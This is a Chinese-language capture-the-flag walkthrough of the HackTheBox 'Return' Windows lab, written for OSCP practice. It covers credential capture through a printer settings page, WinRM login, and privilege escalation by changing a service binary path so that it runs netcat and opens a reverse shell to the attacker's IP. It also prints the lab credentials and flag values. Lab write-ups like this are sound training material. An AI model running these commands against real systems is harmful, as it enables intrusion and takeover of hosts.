【OSCP-HTB.01】 Return靶机渗透测试练习

admin
admin
admin
138733
文章
114
评论
2024年10月25日12:24:30评论16 views字数 2216阅读7分23秒阅读模式

友情提醒

本文阅读时间推荐20min,靶场练习推荐3H

【OSCP-HTB.01】 Return靶机渗透测试练习
如想讨论
以下内容
欢迎关注公众号联系我哟
*OSCP相关技术(备考冲刺中)*
CISSP备考经验(已通过认证)

CCSK(云安全)(已通过认证)

ISO/IEC 27001 Foundation(已通过认证)

OSCP模拟
HTB.Return
一、前言
主要利用方式:*服务回显获取用户密码,winrm连接获取flag*sc绑定*服务二进制进程,重启服务回连获取root
二、靶机信息
靶场: hackthebox.com靶机名称: Return难度: window.Easy发布时间: 27 Sep 2021下载地址:https://app.hackthebox.com/machines/Return备注:window主机,有N多值得学习的地方
三、配置信息
攻击IP:10.10.16.2靶机IP:10.10.11.108
四、信息收集

1、探测靶机ip地址

└─$ sudo nmap -n -v -sC -sV -Pn 10.10.11.108 -oN return_nmap.txt

【OSCP-HTB.01】 Return靶机渗透测试练习

2、探测445端口smb的信息

【OSCP-HTB.01】 Return靶机渗透测试练习

看起来是一个window的主机,并且还有很多域控相关的端口

五、边界突破

3、访问80端口

http://10.10.11.108/

【OSCP-HTB.01】 Return靶机渗透测试练习

在setting中发现了一个类似打印机服务地址,攻击机nc监听,将服务地址改为攻击机IP,并点击update

【OSCP-HTB.01】 Return靶机渗透测试练习

成功获取了一组用户名和密码

Username:svc-printer/password:  1edFg43012!!

【OSCP-HTB.01】 Return靶机渗透测试练习

4、带着账号密码尝试smb及winrm

smb:

└─$ crackmapexec smb 10.10.11.108 --shares -u svc-printer -p '1edFg43012!!'

【OSCP-HTB.01】 Return靶机渗透测试练习

winrm:

└─$ crackmapexec winrm 10.10.11.108 -u svc-printer -p '1edFg43012!!'

【OSCP-HTB.01】 Return靶机渗透测试练习

5、使用winrm连接主机

└─$ evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'

【OSCP-HTB.01】 Return靶机渗透测试练习

探测信息:

【OSCP-HTB.01】 Return靶机渗透测试练习

6、切换目标,获取边界flag

*Evil-WinRM* PS C:Userssvc-printerDocuments> cd ..cd *Evil-WinRM* PS C:Userssvc-printer> cd Desktoptyp*Evil-WinRM* PS C:Userssvc-printerDesktop> type user.txt0968d198bad0fd305cfae6b4b6a0fa1a

【OSCP-HTB.01】 Return靶机渗透测试练习

六、提    权

7、查看若干本账号的权限

查看本用户特权:暂无特权可用

*Evil-WinRM* PS C:Userssvc-printerDesktop> whoami /priv

【OSCP-HTB.01】 Return靶机渗透测试练习

Groups

*Evil-WinRM* PS C:Userssvc-printerDesktop> whoami /groups

【OSCP-HTB.01】 Return靶机渗透测试练习

Net user

*Evil-WinRM* PS C:Userssvc-printerDesktop> net user svc-printer

【OSCP-HTB.01】 Return靶机渗透测试练习

列出安装服务

*Evil-WinRM* PS C:Users> services

【OSCP-HTB.01】 Return靶机渗透测试练习

8、上传nc64.exe文件,进行相关利用

上传nc64.exe文件

*Evil-WinRM* PS C:Users> upload /home/kali/Desktop/nc64.exeInfo: Uploading /home/kali/Desktop/nc64.exe to C:Usersnc64.exe

【OSCP-HTB.01】 Return靶机渗透测试练习

Svc-printer用户上传的文件都在documents目录中

【OSCP-HTB.01】 Return靶机渗透测试练习

挑选一个有特权的服务(如:VGAuthService)修改它的二进制路径

*Evil-WinRM* PS  C:Userssvc-printerDocuments> sc.exe config VGAuthService binPath="C:Userssvc-printerDocumentsnc64.exe -e cmd.exe 10.10.16.2  443"

【OSCP-HTB.01】 Return靶机渗透测试练习

攻击机nc开启监听

【OSCP-HTB.01】 Return靶机渗透测试练习

重启VGAuthService服务,但在有限的时间内,服务会挂掉

sc.exe stop VGAuthServicesc.exe start VGAuthService

【OSCP-HTB.01】 Return靶机渗透测试练习

9、nc回连,获取root.txt

C:Windowssystem32>cd C:UsersAdministratorDesktopC:UsersAdministratorDesktop>type root.txttype root.txt0fb6faec51fb9b96d61618aa1334514d

【OSCP-HTB.01】 Return靶机渗透测试练习

10、Better Reverse Shell

当服务无法以服务方式启动时(对服务二进制文件有特定的要求),它会终止正在运行的进程。如果我的服务二进制文件实际上是nc.exe,并启动nc64.exe,那么即使nc.exe被杀死,nc64.exe也会继续运行:

sc.exe config VGAuthService binpath="C:windowssystem32cmd.exe /c C:Userssvc-printerDocumentsnc64.exe -e cmd 10.10.16.2 443"

【OSCP-HTB.01】 Return靶机渗透测试练习

【OSCP-HTB.01】 Return靶机渗透测试练习

【OSCP-HTB.01】 Return靶机渗透测试练习

END

本期靶场到此结束咯,欢迎添加好友进VX交流群

【OSCP-HTB.01】 Return靶机渗透测试练习

原文始发于微信公众号(从放弃到入门):【OSCP-HTB.01】 Return靶机渗透测试练习

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月25日12:24:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP-HTB.01】 Return靶机渗透测试练习https://cn-sec.com/archives/3313081.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息